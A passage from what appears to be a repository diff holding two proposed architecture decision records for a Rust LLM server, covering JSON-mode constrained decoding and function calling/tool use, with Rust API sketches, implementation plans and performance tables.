- No generation overhead
- Highest quality output
**Cons:**
- Requires training infrastructure
- Multiple model variants to maintain
- Does not generalize to custom schemas
- High storage/deployment cost
---
## Decision Outcome
**Chosen Option: Option B - Constrained Decoding with Optional Post-Validation**
Implement token-level constrained decoding as the primary JSON mode, with optional post-generation validation for models without logit access. This provides guaranteed JSON validity with acceptable performance overhead.
### Rationale
1. **Reliability first**: Agentic workflows require 99%+ success rates; only constrained decoding guarantees this
2. **Framework compatibility**: LangChain, CrewAI, Claude Flow expect reliable JSON mode
3. **Streaming support**: Constrained decoding works with streaming generation
4. **Graceful fallback**: Post-validation mode for models/backends without logit access
5. **Industry standard**: Matches llama.cpp (GBNF), Outlines, guidance library approaches
---
## Technical Specifications
### API Design
```rust
/// JSON Mode configuration for structured output
#[derive(Debug, Clone)]
pub struct JsonModeConfig {
/// Optional JSON Schema for validation
pub schema: Option<JsonSchema>,
/// Strict mode: fail on invalid JSON (vs repair attempts)
pub strict: bool,
/// Repair mode: attempt to fix malformed JSON
pub repair: bool,
/// Grammar file for custom structured formats (GBNF-compatible)
pub grammar: Option<String>,
/// Enable constrained decoding (vs post-validation only)
pub constrained_decoding: bool,
}
impl Default for JsonModeConfig {
fn default() -> Self {
Self {
schema: None,
strict: true,
repair: false,
grammar: None,
constrained_decoding: true,
}
}
}
/// Extended generation parameters with JSON mode
#[derive(Debug, Clone)]
pub struct GenerateParams {
// Existing fields
pub max_tokens: usize,
pub temperature: f32,
pub top_p: f32,
// New JSON mode
pub json_mode: Option<JsonModeConfig>,
}
/// LLM Backend trait with JSON mode support
pub trait LlmBackend {
/// Existing text generation
fn generate(&self, prompt: &str, params: GenerateParams) -> Result<String>;
/// JSON-structured generation (convenience wrapper)
fn generate_json(
&self,
prompt: &str,
schema: Option<JsonSchema>,
params: GenerateParams
) -> Result<serde_json::Value> {
let mut json_params = params.clone();
json_params.json_mode = Some(JsonModeConfig {
schema,
..Default::default()
});
let output = self.generate(prompt, json_params)?;
serde_json::from_str(&output)
.map_err(|e| Error::msg(format!("Invalid JSON output: {}", e)))
}
/// Streaming generation with JSON mode
fn generate_stream(
&self,
prompt: &str,
params: GenerateParams
) -> impl Stream<Item = Result<String>>;
}
```
### JSON Schema Support
```rust
use schemars::schema::RootSchema;
use serde_json::Value;
/// JSON Schema for validation
#[derive(Debug, Clone)]
pub struct JsonSchema {
/// JSON Schema specification (Draft 7 or 2020-12)
pub schema: RootSchema,
}
impl JsonSchema {
/// Create from JSON Schema string
pub fn from_str(schema_json: &str) -> Result<Self> {
let schema: RootSchema = serde_json::from_str(schema_json)?;
Ok(Self { schema })
}
/// Create from Pydantic-style Rust struct
pub fn from_type<T: schemars::JsonSchema>() -> Self {
let schema = schemars::schema_for!(T);
Self { schema }
}
/// Validate JSON value against schema
pub fn validate(&self, value: &Value) -> Result<()> {
let validator = jsonschema::validator_for(&serde_json::to_value(&self.schema)?)?;
validator.validate(value)
.map_err(|e| Error::msg(format!("Schema validation failed: {}", e)))
}
}
```
### Constrained Decoding Implementation
```rust
/// Token-level JSON constraint enforcer
pub struct JsonConstraintDecoder {
/// Current state in JSON grammar (object, array, key, value, etc.)
state: JsonState,
/// Stack of open structures (brackets, braces)
structure_stack: Vec<StructureType>,
/// Expected schema at current position
schema_context: Option<SchemaNode>,
}
#[derive(Debug, Clone, Copy, PartialEq)]
enum JsonState {
Start,
ObjectStart,
ObjectKey,
ObjectColon,
ObjectValue,
ArrayStart,
ArrayValue,
String,
Number,
Boolean,
Null,
End,
}
#[derive(Debug, Clone, Copy, PartialEq)]
enum StructureType {
Object,
Array,
}
impl JsonConstraintDecoder {
/// Apply logit bias based on current state
pub fn apply_constraints(&mut self, logits: &mut [f32], vocab: &Vocabulary) -> Result<()> {
match self.state {
JsonState::Start => {
// Only allow '{' or '['
self.mask_except(logits, vocab, &["{", "["])?;
}
JsonState::ObjectStart => {
// Allow '"' for key or '}' for empty object
self.mask_except(logits, vocab, &["\"", "}"])?;
}
JsonState::ObjectKey => {
// Must be string token (continue string or close with ")
self.allow_string_tokens(logits, vocab)?;
}
JsonState::ObjectColon => {
// Must be ':'
self.mask_except(logits, vocab, &[":"])?;
}
JsonState::ObjectValue => {
// Allow any valid JSON value start
self.allow_value_start(logits, vocab)?;
}
JsonState::ArrayValue => {
// Allow any valid JSON value start or ']' to close
self.allow_value_start(logits, vocab)?;
self.allow_token(logits, vocab, "]")?;
}
// ... other states
_ => {}
}
Ok(())
}
/// Update state based on generated token
pub fn update_state(&mut self, token: &str) -> Result<()> {
match (self.state, token) {
(JsonState::Start, "{") => {
self.structure_stack.push(StructureType::Object);
self.state = JsonState::ObjectStart;
}
(JsonState::Start, "[") => {
self.structure_stack.push(StructureType::Array);
self.state = JsonState::ArrayStart;
}
(JsonState::ObjectStart, "\"") => {
self.state = JsonState::ObjectKey;
}
(JsonState::ObjectKey, "\"") => {
self.state = JsonState::ObjectColon;
}
// ... state transitions
_ => return Err(Error::msg("Invalid JSON token sequence"))
}
Ok(())
}
/// Check if generation is complete
pub fn is_complete(&self) -> bool {
self.state == JsonState::End && self.structure_stack.is_empty()
}
fn mask_except(&self, logits: &mut [f32], vocab: &Vocabulary, allowed: &[&str]) -> Result<()> {
// Set all logits to -inf except allowed tokens
logits.iter_mut().for_each(|l| *l = f32::NEG_INFINITY);
for token in allowed {
if let Some(id) = vocab.token_to_id(token) {
logits[id] = 0.0; // Reset to neutral
}
}
Ok(())
}
}
```
### Schema-Aware Constraints
```rust
impl JsonConstraintDecoder {
/// Apply schema constraints at current position
fn apply_schema_constraints(&mut self, logits: &mut [f32], vocab: &Vocabulary) -> Result<()> {
if let Some(schema) = &self.schema_context {
match schema {
SchemaNode::String => {
// Only allow string tokens
self.allow_string_tokens(logits, vocab)?;
}
SchemaNode::Integer => {
// Only allow numeric tokens (no decimal point)
self.allow_integer_tokens(logits, vocab)?;
}
SchemaNode::Boolean => {
// Only allow 'true' or 'false'
self.mask_except(logits, vocab, &["true", "false"])?;
}
SchemaNode::Enum(values) => {
// Only allow tokens from enum values
let allowed: Vec<&str> = values.iter().map(|s| s.as_str()).collect();
self.mask_except(logits, vocab, &allowed)?;
}
SchemaNode::Object(props) => {
// Only allow property names from schema
let allowed: Vec<&str> = props.keys().map(|s| s.as_str()).collect();
self.allow_tokens(logits, vocab, &allowed)?;
}
// ... other schema types
}
}
Ok(())
}
}
```
### Grammar-Based Generation (GBNF Support)
```rust
/// GBNF (llama.cpp) compatible grammar
#[derive(Debug, Clone)]
pub struct Grammar {
/// Grammar rules in GBNF format
rules: HashMap<String, GrammarRule>,
/// Start rule name
start: String,
}
#[derive(Debug, Clone)]
enum GrammarRule {
/// Terminal: exact string match
Terminal(String),
/// Reference to another rule
Reference(String),
/// Sequence: rules in order
Sequence(Vec<GrammarRule>),
/// Choice: one of multiple rules
Choice(Vec<GrammarRule>),
/// Optional: zero or one
Optional(Box<GrammarRule>),
/// Repeat: zero or more
Repeat(Box<GrammarRule>),
}
impl Grammar {
/// Parse GBNF grammar string
pub fn from_gbnf(grammar_str: &str) -> Result<Self> {
// Parse GBNF format (similar to llama.cpp)
// Example:
// root ::= object
// object ::= "{" ws members ws "}"
// members ::= pair (ws "," ws pair)*
// pair ::= string ws ":" ws value
// ...
todo!("GBNF parser implementation")
}
/// Create JSON grammar
pub fn json() -> Self {
// Built-in JSON grammar
todo!("Built-in JSON grammar")
}
/// Apply grammar constraints to logits
pub fn apply_constraints(
&self,
current_state: &GrammarState,
logits: &mut [f32],
vocab: &Vocabulary
) -> Result<()> {
// Determine valid next tokens based on grammar state
let valid_tokens = self.get_valid_tokens(current_state)?;
// Mask logits for invalid tokens
logits.iter_mut().for_each(|l| *l = f32::NEG_INFINITY);
for token in valid_tokens {
if let Some(id) = vocab.token_to_id(&token) {
logits[id] = 0.0;
}
}
Ok(())
}
}
```
### Post-Validation Mode (Fallback)
```rust
/// JSON repair and validation (for backends without logit access)
pub struct JsonValidator {
schema: Option<JsonSchema>,
strict: bool,
repair: bool,
}
impl JsonValidator {
/// Validate and optionally repair JSON output
pub fn validate(&self, output: &str) -> Result<String> {
// Attempt to parse JSON
match serde_json::from_str::<Value>(output) {
Ok(value) => {
// Valid JSON, check schema
if let Some(schema) = &self.schema {
schema.validate(&value)?;
}
Ok(output.to_string())
}
Err(e) if self.repair => {
// Attempt repair
self.repair_json(output)
}
Err(e) if self.strict => {
Err(Error::msg(format!("Invalid JSON: {}", e)))
}
Err(_) => {
// Non-strict mode: return as-is with warning
Ok(output.to_string())
}
}
}
fn repair_json(&self, output: &str) -> Result<String> {
// Common repairs:
// 1. Add missing closing braces/brackets
// 2. Fix trailing commas
// 3. Escape unescaped quotes
// 4. Remove markdown code fences
let mut repaired = output.to_string();
// Remove markdown code fences
repaired = repaired
.trim_start_matches("```json")
.trim_start_matches("```")
.trim_end_matches("```")
.trim()
.to_string();
// Count open/close braces and brackets
let open_braces = repaired.matches('{').count();
let close_braces = repaired.matches('}').count();
let open_brackets = repaired.matches('[').count();
let close_brackets = repaired.matches(']').count();
// Add missing closing characters
for _ in close_braces..open_braces {
repaired.push('}');
}
for _ in close_brackets..open_brackets {
repaired.push(']');
}
// Validate repaired JSON
serde_json::from_str::<Value>(&repaired)
.map(|_| repaired)
.map_err(|e| Error::msg(format!("Repair failed: {}", e)))
}
}
```
---
## Implementation Plan
### Phase 1: Basic JSON Validation (Week 1)
**Effort:** 2-3 days
1. Implement `JsonModeConfig` and `JsonSchema` types
2. Add `json_mode` field to `GenerateParams`
3. Implement post-generation validation with `JsonValidator`
4. Add `generate_json` convenience method
5. Tests for validation and repair
**Deliverables:**
- Post-validation JSON mode working with all backends
- Schema validation with JSON Schema Draft 7
- Basic repair for common issues
### Phase 2: Constrained Decoding (Week 2-3)
**Effort:** 5-7 days
1. Implement `JsonConstraintDecoder` state machine
2. Integrate with Candle backend logit processing
3. Add schema-aware constraints
4. Streaming support for JSON mode
5. Benchmark performance overhead
**Deliverables:**
- Constrained decoding for Candle backend
- 99%+ valid JSON success rate
- <10% latency overhead
- Streaming JSON generation
### Phase 3: Grammar Support (Week 4-5)
**Effort:** 7-10 days
1. Implement GBNF grammar parser
2. Build grammar state machine
3. Create built-in grammars (JSON, JSONL, CSV, XML)
4. Custom grammar API
5. Grammar compilation and optimization
**Deliverables:**
- GBNF-compatible grammar system
- Built-in grammars for common formats
- Custom grammar support
### Phase 4: Integration & Optimization (Week 6)
**Effort:** 3-5 days
1. Integrate with mistral-rs backend (ADR-008)
2. Framework adapters (LangChain, CrewAI)
3. Performance optimization (caching valid tokens)
4. Documentation and examples
**Deliverables:**
- Framework integration examples
- Optimized constraint checking
- Comprehensive documentation
---
## Performance Impact
### Latency Overhead
| Mode | Overhead | Notes |
|------|----------|-------|
| No JSON mode | 0% | Baseline |
| Post-validation only | <1% | Validation after generation |
| Constrained decoding | 5-10% | Per-token logit masking |
| Grammar-based | 8-12% | Complex grammar state machine |
### Memory Overhead
| Component | Memory | Notes |
|-----------|--------|-------|
| JSON state machine | ~1KB | Negligible |
| Schema tree | 10-100KB | Depends on schema complexity |
| Grammar rules | 50-500KB | GBNF grammar compilation |
| Valid token cache | 100-500KB | Per-state valid token sets |
### Reliability Improvement
| Method | Valid JSON Rate | Schema Conformance |
|--------|-----------------|-------------------|
| Prompt engineering only | 85-95% | 70-85% |
| Post-validation + repair | 95-98% | 85-95% |
| Constrained decoding | 99.9%+ | 99%+ |
---
## Consequences
### Positive Consequences
1. **Production reliability**: 99%+ success rate enables reliable agentic workflows
2. **Framework compatibility**: Direct integration with LangChain, CrewAI, Claude Flow
3. **Developer experience**: Simple API eliminates retry loops and error handling
4. **Streaming support**: JSON mode works with streaming generation
5. **Future extensibility**: Grammar support enables custom structured formats
### Negative Consequences
1. **Performance overhead**: 5-10% latency increase for constrained decoding
2. **Implementation complexity**: State machine and grammar parsing add code complexity
3. **Backend limitations**: Not all backends support logit access (fallback to post-validation)
4. **Token vocabulary dependency**: Constraint effectiveness depends on tokenizer granularity
### Neutral Consequences
1. **Optional feature**: JSON mode is opt-in via `GenerateParams`
2. **Graceful degradation**: Falls back to post-validation for unsupported backends
3. **Schema flexibility**: Supports JSON Schema, Pydantic, and custom grammars
### Risk Mitigation
| Risk | Mitigation |
|------|------------|
| High latency overhead | Cache valid token sets per state; optimize state transitions |
| Complex grammar bugs | Extensive test suite with fuzzing; start with simple JSON grammar |
| Tokenizer edge cases | Handle subword tokens; fallback to character-level constraints |
| Schema complexity | Limit schema depth; provide performance warnings for complex schemas |
---
## Alternatives Considered
### Prompt Engineering Only
- **Rejected**: 85-95% success rate insufficient for production
- **Consideration**: Still useful as complementary technique
### Model-Specific JSON Modes
- **Rejected**: Requires separate models; doesn't generalize to custom schemas
- **Consideration**: Could offer as optimization for common cases
### External Validation Services
- **Rejected**: Adds network latency; doesn't prevent generation failures
- **Consideration**: Could integrate as async validation for auditing
---
## Related Decisions
- **ADR-001**: Ruvector Core Architecture (HNSW, Graph Store)
- **ADR-002**: RuvLLM Integration with Ruvector
- **ADR-007**: Security Review & Technical Debt
- **ADR-008**: mistral-rs Integration for Production-Scale LLM Serving
---
## Compliance and Standards
### JSON Schema Standards
- JSON Schema Draft 7 (primary support)
- JSON Schema 2020-12 (future)
- Pydantic model compatibility
### Grammar Standards
- GBNF (llama.cpp) compatibility
- EBNF subset for custom grammars
- Regex-based constraints (limited support)
### Framework Compatibility
- LangChain StructuredOutputParser
- CrewAI tool schemas
- Claude Flow structured outputs
- AutoGen function calling
### Testing Requirements
- Unit tests for state machine transitions
- Integration tests with sample schemas
- Fuzzing for grammar parser
- Benchmark suite for performance
- Framework integration tests
### Documentation Requirements
- JSON mode API guide
- Schema definition tutorial
- Grammar syntax reference
- Framework integration examples
- Performance optimization guide
---
## References
1. **llama.cpp GBNF**: https://github.com/ggerganov/llama.cpp/blob/master/grammars/README.md
2. **Outlines Library**: https://github.com/outlines-dev/outlines - Structured text generation
3. **Guidance Library**: https://github.com/guidance-ai/guidance - Constrained generation
4. **JSON Schema**: https://json-schema.org/specification
5. **LangChain StructuredOutput**: https://python.langchain.com/docs/modules/model_io/output_parsers/structured
6. **OpenAI JSON Mode**: https://platform.openai.com/docs/guides/structured-outputs
7. **Anthropic Tool Use**: https://docs.anthropic.com/en/docs/build-with-claude/tool-use
---
## Implementation Status
| Component | Status | Effort | Notes |
|-----------|--------|--------|-------|
| JsonModeConfig types | Pending | 0.5 days | Basic config structures |
| JsonSchema validation | Pending | 1 day | JSON Schema Draft 7 support |
| Post-validation mode | Pending | 1 day | Fallback for all backends |
| JSON repair | Pending | 1 day | Common malformation fixes |
| JsonConstraintDecoder | Pending | 3 days | State machine for JSON grammar |
| Schema-aware constraints | Pending | 2 days | Schema-driven logit masking |
| Streaming JSON | Pending | 2 days | Stream-compatible constraints |
| GBNF parser | Pending | 5 days | Grammar definition language |
| Grammar state machine | Pending | 3 days | Generic grammar constraints |
| Built-in grammars | Pending | 2 days | JSON, JSONL, CSV, XML |
| Candle integration | Pending | 2 days | Wire to Candle backend |
| mistral-rs integration | Pending | 2 days | Wire to mistral-rs backend |
| Framework adapters | Pending | 3 days | LangChain, CrewAI examples |
| Performance optimization | Pending | 2 days | Token caching, fast paths |
| Documentation | Pending | 3 days | API guide, examples, tutorials |
**Total Effort:** ~30-35 days (1 developer)
**Phased Delivery:** 4-6 weeks
---
## Revision History
| Version | Date | Author | Changes |
|---------|------|--------|---------|
| 1.0 | 2026-01-20 | Ruvector Architecture Team | Initial proposal |

View File

@@ -0,0 +1,930 @@
# ADR-010: Function Calling / Tool Use in RuvLLM
**Status:** Proposed
**Date:** 2026-01-20
**Decision Makers:** Ruvector Architecture Team
**Technical Area:** LLM Capabilities / Agent Framework Integration
---
## Context and Problem Statement
RuvLLM currently provides text generation capabilities but lacks structured function calling (tool use) support, which is essential for integration with modern agent frameworks like LangChain, LlamaIndex, CrewAI, and AutoGPT. Function calling enables models to interact with external tools, APIs, and databases in a structured, type-safe manner.
### Current State
RuvLLM's generation API is limited to:
- Text-in, text-out generation
- No structured output parsing
- No tool/function definition support
- Manual prompt engineering required for tool interactions
- No support for multi-turn tool conversations
### Key Challenges
1. **Agent Framework Integration**: Popular frameworks expect OpenAI-compatible function calling APIs
2. **Structured Outputs**: Models need to generate valid JSON function calls, not freeform text
3. **Multi-Turn Conversations**: Tool results must be fed back to the model for reasoning
4. **Parallel Tool Calls**: Efficient agents need to call multiple tools simultaneously
5. **Model Format Compatibility**: Different models (Llama, Mistral, Qwen) use different tool calling formats
---
## Decision Drivers
### Functional Requirements
- **Tool Definitions**: JSON Schema-based function signatures
- **Tool Choice Control**: Auto, none, required, or specific function selection
- **Parallel Calls**: Multiple function calls in a single response
- **Result Integration**: Feeding tool outputs back to the model
- **Type Safety**: Validate function arguments against schemas
### Compatibility Requirements
- **OpenAI API Compatible**: Drop-in replacement for OpenAI function calling
- **Anthropic Tool Use**: Map to Anthropic's tool_use format
- **Framework Integration**: Direct support for LangChain, LlamaIndex, CrewAI
- **Model Agnostic**: Work across Llama 3.1+, Mistral, Qwen, custom models
### Performance Requirements
- **Constrained Generation**: Force valid JSON output via logit biasing
- **Low Latency**: <10ms overhead for tool call parsing
- **Streaming Support**: Stream tool calls as they're generated
- **Batching**: Process multiple tool calls efficiently
---
## Considered Options
### Option A: Prompt Engineering Only
Use structured prompts to request tool calls in JSON format, parse with regex/JSON parsers.
**Pros:**
- No core changes to generation logic
- Works with any model
- Simple implementation
**Cons:**
- Unreliable: models may generate invalid JSON
- No type safety guarantees
- Poor support for parallel tool calls
- Requires extensive prompt tuning per model
### Option B: Constrained Generation with Grammar
Implement constrained decoding using formal grammars (GBNF, JSON Schema) to force valid tool calls.
**Pros:**
- Guarantees valid JSON output
- Type-safe by construction
- Works across model architectures
- Best reliability for production
**Cons:**
- Complex implementation (logit masking)
- Requires grammar compiler
- Potential performance overhead
### Option C: Model-Specific Chat Templates
Leverage each model family's native tool calling format via chat templates.
**Pros:**
- Optimal for models with native tool support (Llama 3.1+, Mistral)
- Minimal overhead
- Leverages model training
**Cons:**
- Fragmented implementation across models
- No support for models without native tool calling
- Template maintenance burden
---
## Decision Outcome
**Chosen Option: Hybrid Approach - Option B (Constrained Generation) + Option C (Chat Templates)**
Implement constrained generation with grammar-based validation as the foundation, with chat template optimizations for models with native tool calling support.
### Rationale
1. **Reliability First**: Constrained generation guarantees valid outputs for critical production use cases
2. **Performance Optimization**: Chat templates optimize for models with native support (Llama 3.1+, Mistral)
3. **Universal Compatibility**: Fallback to constrained generation for any model
4. **Future-Proof**: New models can be added via chat templates without core changes
---
## Technical Specifications
### Tool Definition Schema
```rust
use serde::{Deserialize, Serialize};
use schemars::JsonSchema;
/// Tool/function definition for function calling
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct ToolDefinition {
/// Function name (must be valid identifier)
pub name: String,
/// Human-readable description for the model
pub description: String,
/// JSON Schema for function parameters
pub parameters: JsonSchema,
/// Required parameter names
#[serde(default)]
pub required: Vec<String>,
}
/// JSON Schema representation
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct JsonSchema {
#[serde(rename = "type")]
pub schema_type: String,
#[serde(skip_serializing_if = "Option::is_none")]
pub properties: Option<std::collections::HashMap<String, JsonSchema>>,
#[serde(skip_serializing_if = "Option::is_none")]
pub items: Option<Box<JsonSchema>>,
#[serde(skip_serializing_if = "Option::is_none")]
pub description: Option<String>,
#[serde(skip_serializing_if = "Option::is_none")]
pub enum_values: Option<Vec<String>>,
}
/// Tool choice mode for generation
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(rename_all = "snake_case")]
pub enum ToolChoice {
/// Model decides whether to call tools
Auto,
/// Model must not call any tools
None,
/// Model must call at least one tool
Required,
/// Model must call this specific function
Specific(String),
}
```
### Tool Call Request and Response
```rust
/// Request with tool calling support
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct ToolCallRequest {
/// User message/prompt
pub messages: Vec<ChatMessage>,
/// Available tools/functions
#[serde(default)]
pub tools: Vec<ToolDefinition>,
/// Tool choice mode
#[serde(default)]
pub tool_choice: ToolChoice,
/// Enable parallel tool calls (default: true)
#[serde(default = "default_true")]
pub parallel_tool_calls: bool,
/// Standard generation parameters
#[serde(flatten)]
pub params: GenerateParams,
}
/// Tool call in model response
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct ToolCall {
/// Unique identifier for this tool call
pub id: String,
/// Type (always "function" for now)
#[serde(rename = "type")]
pub call_type: String,
/// Function call details
pub function: FunctionCall,
}
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct FunctionCall {
/// Function name (must match a tool definition)
pub name: String,
/// JSON-encoded function arguments
pub arguments: serde_json::Value,
}
/// Chat message with tool call support
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct ChatMessage {
/// Role: system, user, assistant, tool
pub role: String,
/// Text content
#[serde(skip_serializing_if = "Option::is_none")]
pub content: Option<String>,
/// Tool calls (for assistant messages)
#[serde(skip_serializing_if = "Option::is_none")]
pub tool_calls: Option<Vec<ToolCall>>,
/// Tool call ID (for tool result messages)
#[serde(skip_serializing_if = "Option::is_none")]
pub tool_call_id: Option<String>,
}
fn default_true() -> bool { true }
```
### Chat Template Integration
Different models require different formatting for tool calling:
```rust
/// Chat template for tool calling
pub trait ToolCallingTemplate {
/// Format messages with tool definitions
fn format_with_tools(
&self,
messages: &[ChatMessage],
tools: &[ToolDefinition],
tool_choice: &ToolChoice,
) -> Result<String>;
/// Parse tool calls from model output
fn parse_tool_calls(&self, output: &str) -> Result<Vec<ToolCall>>;
/// Check if model has native tool calling support
fn has_native_support(&self) -> bool;
}
/// Llama 3.1+ tool calling format
pub struct Llama31ToolTemplate;
impl ToolCallingTemplate for Llama31ToolTemplate {
fn format_with_tools(
&self,
messages: &[ChatMessage],
tools: &[ToolDefinition],
tool_choice: &ToolChoice,
) -> Result<String> {
// Llama 3.1 uses special <|python_tag|> tokens for tools
let mut prompt = String::new();
// Add tool definitions
prompt.push_str("<|start_header_id|>system<|end_header_id|>\n\n");
prompt.push_str("Available tools:\n");
for tool in tools {
prompt.push_str(&format!(
"<|python_tag|>{}<|eom_id|>\n",
serde_json::to_string_pretty(tool)?
));
}
// Add conversation history
for msg in messages {
prompt.push_str(&format!(
"<|start_header_id|>{}<|end_header_id|>\n\n{}<|eom_id|>\n",
msg.role,
msg.content.as_deref().unwrap_or("")
));
}
// Start assistant response
prompt.push_str("<|start_header_id|>assistant<|end_header_id|>\n\n");
Ok(prompt)
}
fn parse_tool_calls(&self, output: &str) -> Result<Vec<ToolCall>> {
// Parse <|python_tag|>{"name": "...", "arguments": {...}}<|eom_id|>
// Implementation details omitted for brevity
todo!("Parse Llama 3.1 tool call format")
}
fn has_native_support(&self) -> bool { true }
}
/// Mistral tool calling format
pub struct MistralToolTemplate;
impl ToolCallingTemplate for MistralToolTemplate {
fn format_with_tools(
&self,
messages: &[ChatMessage],
tools: &[ToolDefinition],
tool_choice: &ToolChoice,
) -> Result<String> {
// Mistral uses [AVAILABLE_TOOLS] and [/AVAILABLE_TOOLS] markers
let mut prompt = String::new();
prompt.push_str("[AVAILABLE_TOOLS]\n");
prompt.push_str(&serde_json::to_string(tools)?);
prompt.push_str("\n[/AVAILABLE_TOOLS]\n\n");
// Add conversation
for msg in messages {
prompt.push_str(&format!("[INST] {} [/INST]\n", msg.content.as_deref().unwrap_or("")));
}
Ok(prompt)
}
fn parse_tool_calls(&self, output: &str) -> Result<Vec<ToolCall>> {
// Parse [TOOL_CALLS] ... [/TOOL_CALLS]
todo!("Parse Mistral tool call format")
}
fn has_native_support(&self) -> bool { true }
}
/// Qwen tool calling format
pub struct QwenToolTemplate;
/// Generic XML-based format for models without native support
pub struct GenericXmlToolTemplate;
impl ToolCallingTemplate for GenericXmlToolTemplate {
fn format_with_tools(
&self,
messages: &[ChatMessage],
tools: &[ToolDefinition],
tool_choice: &ToolChoice,
) -> Result<String> {
// Generic format using XML tags
let mut prompt = String::from(
"You have access to the following tools. To use a tool, respond with:\n\
<tool_call>\n\
<name>function_name</name>\n\
<arguments>{\"arg1\": \"value1\"}</arguments>\n\
</tool_call>\n\n"
);
prompt.push_str("Available tools:\n");
for tool in tools {
prompt.push_str(&format!("- {}: {}\n", tool.name, tool.description));
prompt.push_str(&format!(" Parameters: {}\n",
serde_json::to_string(&tool.parameters)?));
}
prompt.push_str("\n");
// Add conversation
for msg in messages {
prompt.push_str(&format!("{}: {}\n", msg.role, msg.content.as_deref().unwrap_or("")));
}
Ok(prompt)
}
fn parse_tool_calls(&self, output: &str) -> Result<Vec<ToolCall>> {
// Parse <tool_call>...</tool_call> blocks
use regex::Regex;
let re = Regex::new(
r"<tool_call>\s*<name>([^<]+)</name>\s*<arguments>([^<]+)</arguments>\s*</tool_call>"
)?;
let mut calls = Vec::new();
for cap in re.captures_iter(output) {
calls.push(ToolCall {
id: uuid::Uuid::new_v4().to_string(),
call_type: "function".to_string(),
function: FunctionCall {
name: cap[1].to_string(),
arguments: serde_json::from_str(&cap[2])?,
},
});
}
Ok(calls)
}
fn has_native_support(&self) -> bool { false }
}
```
### Constrained Generation Engine
For guaranteed valid JSON output, implement constrained decoding:
```rust
use serde_json::Value as JsonValue;
/// Constrained generation for tool calls
pub struct ConstrainedToolGenerator {
/// JSON Schema grammar compiler
grammar_compiler: GrammarCompiler,
/// Logit processor for constraint enforcement
logit_processor: LogitProcessor,
}
impl ConstrainedToolGenerator {
/// Generate tool calls with grammar constraints
pub fn generate_tool_calls(
&self,
model: &LlmBackend,
prompt: &str,
tools: &[ToolDefinition],
params: GenerateParams,
) -> Result<Vec<ToolCall>> {
// Compile JSON Schema to GBNF grammar
let grammar = self.compile_tool_grammar(tools)?;
// Generate with logit masking to enforce grammar
let output = model.generate_constrained(prompt, &grammar, params)?;
// Parse guaranteed-valid JSON
let calls: Vec<ToolCall> = serde_json::from_str(&output)?;
Ok(calls)
}
/// Compile JSON Schema into GBNF grammar
fn compile_tool_grammar(&self, tools: &[ToolDefinition]) -> Result<Grammar> {
// Build grammar that only allows valid tool calls
// Example: tool_call ::= "{" ws "\"name\"" ws ":" ws name ws "," ws "\"arguments\"" ws ":" ws arguments ws "}"
// name ::= "\"tool1\"" | "\"tool2\"" | ...
// arguments ::= { schema-specific grammar }
self.grammar_compiler.compile_tool_schema(tools)
}
}
/// GBNF (GGML BNF) grammar for constrained generation
#[derive(Debug, Clone)]
pub struct Grammar {
/// Grammar rules in GBNF format
pub rules: String,
}
/// Logit processor for grammar enforcement
pub struct LogitProcessor {
/// Current parse state
state: ParseState,
}
impl LogitProcessor {
/// Mask logits to only allow valid next tokens
pub fn process_logits(
&mut self,
logits: &mut [f32],
grammar: &Grammar,
tokenizer: &Tokenizer,
) -> Result<()> {
// Get valid next tokens from grammar state
let valid_tokens = self.state.get_valid_next_tokens(grammar)?;
// Mask out invalid tokens (set logit to -inf)
for (token_id, logit) in logits.iter_mut().enumerate() {
if !valid_tokens.contains(&(token_id as u32)) {
*logit = f32::NEG_INFINITY;
}
}
Ok(())
}
}
#[derive(Debug)]
struct ParseState {
/// Current position in grammar
position: usize,
/// Parse stack for nested structures
stack: Vec<String>,
}
```
### Multi-Turn Tool Conversations
Support iterative tool use:
```rust
/// Multi-turn conversation with tool calls
pub struct ToolConversation {
/// Conversation history
messages: Vec<ChatMessage>,
/// Available tools
tools: Vec<ToolDefinition>,
/// Backend for generation
backend: Box<dyn LlmBackend>,
}
impl ToolConversation {
/// Add user message and generate response (may include tool calls)
pub fn send_message(&mut self, content: &str) -> Result<ConversationTurn> {
// Add user message
self.messages.push(ChatMessage {
role: "user".to_string(),
content: Some(content.to_string()),
tool_calls: None,
tool_call_id: None,
});
// Generate response with tool calls
let request = ToolCallRequest {
messages: self.messages.clone(),
tools: self.tools.clone(),
tool_choice: ToolChoice::Auto,
parallel_tool_calls: true,
params: GenerateParams::default(),
};
let response = self.backend.generate_with_tools(request)?;
// Add assistant response to history
self.messages.push(ChatMessage {
role: "assistant".to_string(),
content: response.content.clone(),
tool_calls: response.tool_calls.clone(),
tool_call_id: None,
});
Ok(ConversationTurn {
content: response.content,
tool_calls: response.tool_calls,
})
}
/// Submit tool results and continue conversation
pub fn submit_tool_results(&mut self, results: Vec<ToolResult>) -> Result<ConversationTurn> {
// Add tool result messages
for result in results {
self.messages.push(ChatMessage {
role: "tool".to_string(),
content: Some(result.output),
tool_calls: None,
tool_call_id: Some(result.tool_call_id),
});
}
// Generate next response
self.send_message("")
}
}
#[derive(Debug, Clone)]
pub struct ConversationTurn {
/// Text content
pub content: Option<String>,
/// Tool calls (if any)
pub tool_calls: Option<Vec<ToolCall>>,
}
#[derive(Debug, Clone)]
pub struct ToolResult {
/// Tool call ID this result corresponds to
pub tool_call_id: String,
/// Tool output (JSON or text)
pub output: String,
}
```
---
## Implementation Plan
### Phase 1: Core Infrastructure (Week 1-2)
1. **Define Tool Schema Types**
- Implement `ToolDefinition`, `ToolCall`, `ToolChoice` types
- Add JSON Schema validation
- Create builder APIs for ergonomic tool definitions
2. **Chat Template Integration**
- Implement `ToolCallingTemplate` trait
- Add Llama 3.1, Mistral, Qwen templates
- Create generic XML fallback template
3. **Request/Response API**
- Extend `LlmBackend` with `generate_with_tools` method
- Add tool call parsing logic
- Implement OpenAI-compatible API surface
**Deliverables:**
```rust
// User-facing API
let tools = vec![
ToolDefinition::new("get_weather")
.description("Get current weather for a location")
.parameter("location", JsonSchema::string())
.parameter("units", JsonSchema::enum_values(&["celsius", "fahrenheit"]))
.required(&["location"])
];
let request = ToolCallRequest {
messages: vec![
ChatMessage::user("What's the weather in San Francisco?")
],
tools,
tool_choice: ToolChoice::Auto,
parallel_tool_calls: true,
